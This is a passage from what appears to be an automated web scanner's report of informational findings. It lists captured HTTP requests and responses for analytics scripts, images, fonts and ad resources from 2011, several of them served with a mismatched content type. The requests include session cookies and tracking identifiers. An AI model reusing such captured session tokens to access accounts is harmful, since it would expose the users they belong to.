Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:16 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=113;ecid=167047614690248879,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

17.32. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Request

GET /EndUser/jscripts/s_code_profile.js HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http%3A%2F%2Flandingpad.oracle.com%2Fwebapps%2Fdialogue%2Fdlgpage.jsp%3Fp_dlg_id%3D8810727%26src%3D6804803%26act%3D24%26id1%3D8810728%26id2%3D8810730%26r1%3D-1%26r2%3D-1%26r0%3D-1%26pe%3Dnull%26pr%3D365.0%26pt%3DY%26pd%3DY%26xs%3D6804803%26xa%3D24%26pu%3DNull%26po%3DWWMK09049794MP%26ps%3DN%26p_ext%3DY%26p_tm%3DNull
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762779613; gpv_p24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; gpw_e24=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DDialogue%252520Welcome%252520Page%25253AWWMK09049794MP%25253A6804803%25253A8810727%25253A24%2526pidt%253D1%2526oid%253Djavascript%25253AProfileLpOpen%252528%252529%25253B%2526ot%253DA; JSESSIONID=GQ6cNpMPN5vvxtKdGlKhGZKFrGh7Tq47Sx2RRJR9T0mQQ1qr6ww1!-1135232050!957286243; BIGipServermktap-myprofile-endusr_http_pool=2953613965.26910.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:24:07 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=122;ecid=167047606100314287,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

17.33. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1137&ref2=elqNone&tzo=360&ms=748 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:00:08 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

17.34. http://o.aolcdn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=1209600
Expires: Mon, 14 Mar 2011 21:29:08 GMT
Date: Mon, 28 Feb 2011 21:29:08 GMT
Content-Length: 15
Connection: close
Vary: Accept-Encoding
X-N: S

File not found.

17.35. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/makeRequest

Request

GET /gadgets/makeRequest?refresh=3600&url=http%3A%2F%2Ffcgadgets.appspot.com%2Fs%2Ff%3Fn%3D0.7136734309606254%26pageurl%3Dhttp%3A%2F%2Fwww.cloudscan.me%2F2010_09_01_archive.html&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.555.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2010_09_01_archive.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1298944417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.1539426966.1298944417.1298944417.1298944417.1; __utmc=209791819; __utmb=209791819.1.10.1298944417

Response

HTTP/1.1 200 OK
Expires: Tue, 01 Mar 2011 02:53:01 GMT
Cache-Control: public,max-age=3600
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Tue, 01 Mar 2011 01:53:01 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 356

throw 1; < don't be evil' >{"http://fcgadgets.appspot.com/s/f?n=0.7136734309606254&pageurl=http://www.cloudscan.me/2010_09_01_archive.html":{"body":"\u003c?xml version=\"1.0\" encoding=\"UTF-8\" ?\u00
...[SNIP]...

17.36. http://photos4.meetupstatic.com/photos/event/b/6/d/highres_21062925.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://photos4.meetupstatic.com
Path:   /photos/event/b/6/d/highres_21062925.jpeg

Request

GET /photos/event/b/6/d/highres_21062925.jpeg HTTP/1.1
Host: photos4.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 30349
Cache-Control: max-age=28100568
Expires: Fri, 20 Jan 2012 19:28:57 GMT
Date: Tue, 01 Mar 2011 13:46:09 GMT
Connection: close

.PNG
.
...IHDR...o...........3....    pHYs...H...H.F.k>...    vpAg...o...........u.IDATx...w|..y/...93...Bt....E,"..f[.U..d9.....$yu...:y...~..7.S...........,Y.E,.;......:......K.......e|.[fgvv.7..)...d.!
...[SNIP]...

17.37. http://rapportive.com/fonts/aller-lt-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rapportive.com
Path:   /fonts/aller-lt-webfont.woff

Request

GET /fonts/aller-lt-webfont.woff HTTP/1.1
Host: rapportive.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/help
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41153825.1298985423.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41153825.1651410068.1298985423.1298985423.1298985423.1; __utmc=41153825; __utmb=41153825.2.10.1298985423; _relascale_session=BAh7BjoPc2Vzc2lvbl9pZCIlM2ZiYzQ4Nzc0M2IwYzA1NTViM2UzMmU0Y2RlZjE5ZTI%3D--b39993fe2a728d46321dea2967c06a6b44ac819c

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 13:18:18 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Mon, 28 Feb 2011 18:05:08 GMT
Cache-Control: public, max-age=43200
X-Varnish: 4110749201 4106807063
Age: 22787
Via: 1.1 varnish
Content-Length: 28912

wOFF......p.................................FFTM............W.`.GDEF.......E...P.:..GPOS..........1 .n.    GSUB....... ... l.t.OS/2...8...Y...`....cmap............/..ccvt ...,..."..."._.?fpgm...P.......e
...[SNIP]...

17.38. http://rt.disqus.com/forums/realtime-cached.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.disqus.com
Path:   /forums/realtime-cached.js

Request

GET /forums/realtime-cached.js?timestamp=2011-02-26_21:28:27&thread_id=232207777&f=techcrunch&1298773844054 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-930191663-1298773827745; disqus_unique=166277640732

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:24 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 67
Last-Modified: Thu, 09 Dec 2010 00:48:51 GMT
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

17.39. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s3.amazonaws.com
Path:   /getsatisfaction.com/images/transparent.gif

Request

GET /getsatisfaction.com/images/transparent.gif HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: wXFWIXIRJ8Eq7PCX7ohqRZ2eKpi3jPTuYlKfeS7A7NuC2KrB0qlsPnwD0osrppS1
x-amz-request-id: AB1D1C3DB55E1AEF
Date: Tue, 01 Mar 2011 13:16:04 GMT
Cache-Control: Fri Feb 24 16:58:10 -0800 2012
Expires: Fri Feb 24 16:58:10 -0800 2012
Last-Modified: Fri, 25 Feb 2011 00:58:14 GMT
ETag: "4408efc0174f07ad685c456f1de521ca"
Accept-Ranges: bytes
Content-Type: image/png
Content-Length: 49
Server: AmazonS3

GIF89a...................!.......,...........D..;

17.40. http://s3.amazonaws.com/getsatisfaction.com/javascripts/feedback-v2.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s3.amazonaws.com
Path:   /getsatisfaction.com/javascripts/feedback-v2.js

Request

GET /getsatisfaction.com/javascripts/feedback-v2.js HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://klout.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: RJSzsPqNuHavaa0aZcx936pIUbg9u8setPN7YW0oTGmsebaCxtjLAkaxB01zGAqn
x-amz-request-id: F2D750E743DDFD41
Date: Tue, 01 Mar 2011 02:07:52 GMT
Cache-Control: Fri Feb 24 16:58:10 -0800 2012
Expires: Fri Feb 24 16:58:10 -0800 2012
Last-Modified: Fri, 25 Feb 2011 00:58:15 GMT
ETag: "4f1f7e9c52ed3a6c839cc08ca6580607"
Accept-Ranges: bytes
Content-Type: image/png
Content-Length: 12107
Server: AmazonS3

var GSFN;
if(GSFN == undefined) {
GSFN = {};
}

if(!GSFN.initialized) {

GSFN.gId = function(id) {
return document.getElementById(id);
};

GSFN.hasClassName = function(element, classNam
...[SNIP]...

17.41. http://s3.buysellads.com/1236348/32247-1280107285.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s3.buysellads.com
Path:   /1236348/32247-1280107285.gif

Request

GET /1236348/32247-1280107285.gif HTTP/1.1
Host: s3.buysellads.com
Proxy-Connection: keep-alive
Referer: http://davidwalsh.name/google-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sun, 27 Feb 2011 16:31:39 GMT
Content-Type: image/gif
Connection: keep-alive
x-amz-id-2: 8jBc28BXywNdh3gRs93H8wqSEUS3zFCIconj2ad2fSi6oUe+dg7jK3Xb9Zvthmzg
x-amz-request-id: A20E5160A271F1FF
Last-Modified: Mon, 26 Jul 2010 01:21:33 GMT
ETag: "15a326c3e47bb3e005862022bee7ecbc"
Content-Length: 3010
Accept-Ranges: bytes

.PNG
.
...IHDR...}...}......^......PLTE....??.......???...cbb...............<;;...............}||IHHVUU....//___...............poo...ooo.......OO..........B.///..........__.oo...OOO{2.q#x......
...[SNIP]...

17.42. http://s3.buysellads.com/1236348/48698-1295754678.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s3.buysellads.com
Path:   /1236348/48698-1295754678.gif

Request

GET /1236348/48698-1295754678.gif HTTP/1.1
Host: s3.buysellads.com
Proxy-Connection: keep-alive
Referer: http://davidwalsh.name/google-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sun, 27 Feb 2011 16:31:49 GMT
Content-Type: image/gif
Connection: keep-alive
x-amz-id-2: ZTHnTJZHq/p5RQ9pGaN6zgyOuZr9ftm/44lcLdVx8PaHA7qLuCKJ5cMxs7U+nypz
x-amz-request-id: 87AB2D7B2F6B9CB6
Last-Modified: Sun, 23 Jan 2011 03:51:28 GMT
ETag: "b3b3b2505a74f80a8d060efbc84d9c1a"
Content-Length: 6076
Accept-Ranges: bytes

.PNG
.
...IHDR...}...}......^......PLTE....q'......XZ\.....Q...........Tace......k.~........,..!............._l.....b[.p......O.f...47;..9.....:..3........1....... (.....................V...........
...[SNIP]...

17.43. http://s4.histats.com/stats/1257017.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s4.histats.com
Path:   /stats/1257017.php

Request

GET /stats/1257017.php?1257017&@f16&@g1&@h1&@i1&@j1298824274788&@k0&@l1&@mMy%20own%20URL%20shortening%20%7C%20Ahmy%20Yulrizka&@n0&@o1000&@q0&@r0&@s107&@ten-US&@u1920&@vhttp%3A%2F%2Fahmy.yulrizka.com%2F2011%2F02%2Fmy-own-url-shortening%2F&@w HTTP/1.1
Host: s4.histats.com
Proxy-Connection: keep-alive
Referer: http://ahmy.yulrizka.com/2011/02/my-own-url-shortening/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "2170811634"
Last-Modified: Sun, 27 Feb 2011 01:45:24 GMT
Content-Length: 97
Date: Sun, 27 Feb 2011 16:31:15 GMT
Server: lighttpd/1.4.28

_HST_cntval="#7Online=1#6Pages=1909#5Pag. today=3#4Visits=1252#3Vis. today=3";chfh2(_HST_cntval);

17.44. http://s4.histats.com/stats/e.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s4.histats.com
Path:   /stats/e.php

Request

GET /stats/e.php?1257017&@Ab&@R36590&@w HTTP/1.1
Host: s4.histats.com
Proxy-Connection: keep-alive
Referer: http://ahmy.yulrizka.com/2011/02/my-own-url-shortening/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "2970768443"
Last-Modified: Tue, 07 Sep 2010 12:25:15 GMT
Content-Length: 1
Date: Sun, 27 Feb 2011 16:32:00 GMT
Server: lighttpd/1.4.28

;

17.45. http://server.iad.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hcp/html/mTag.js

Request

GET /hcp/html/mTag.js?site=43040610 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=44502044936234,d=1297806164

Response

HTTP/1.1 200 OK
Content-Length: 17314
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=43040610
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "4de42f686ecb1:c25"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 16:31:55 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

17.46. http://shop.winamp.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.winamp.com
Path:   /DRHM/store

Request

GET /DRHM/store?Action=DisplayPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Referer: http://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828698256-New%7C1361900698256%3B%20s_nrgvo%3DNew%7C1361900698258%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=148884573591,0)
Date: Sun, 27 Feb 2011 17:44:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 6616


<!-- REQUEST ID: TIME=1298828691484:NODE=c1a5902:THREAD=65 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&ceid=168713900&c
...[SNIP]...

17.47. http://static.fmpub.net/zone/1535  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.fmpub.net
Path:   /zone/1535

Request

GET /zone/1535 HTTP/1.1
Host: static.fmpub.net
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Last-Modified: Mon, 28 Feb 2011 05:06:40 GMT
Accept-Ranges: bytes
X-Server: static1.tor.fmpub.net
Keep-Alive: timeout=120, max=982
Content-Type: text/plain; charset=UTF-8
Connection: Keep-Alive
Date: Tue, 01 Mar 2011 01:55:27 GMT
Age: 568
Content-Length: 5036


var fmJsHost = (("https:" == document.location.protocol) ? "https://" : "http://");


var fm_query_string = window.location.search.substr(1).split('&');
var fm_pairs = {};
for (var i = 0; i < fm_quer
...[SNIP]...

17.48. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://storify.com
Path:   /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view

Request

GET /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view?callback=jsonp1298987223960 HTTP/1.1
Host: storify.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg3MTY5NjUyLCJhdXRoIjp7fX0!56b75e32d6a0f727bda3501f38f5f4f2

Response

HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg4NzM2MDI1LCJhdXRoIjp7fX0!409cb640c61cfa8d6cd47d5514ed63e2; httpOnly; path=/
Content-Length: 36
Date: Tue, 01 Mar 2011 14:12:16 GMT
X-Varnish: 634703003
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

jsonp1298987223960("Recorded view")

17.49. http://syndication.jobthread.com/jt/syndication/page.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://syndication.jobthread.com
Path:   /jt/syndication/page.php

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.businessinsider.com&num_jobs=10&num_featured_jobs=1&subtype=businessinsider&custom_section=sai&display_method=default&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/gabriel-weinberg-duckduckgo-2011-1
Accept: */*
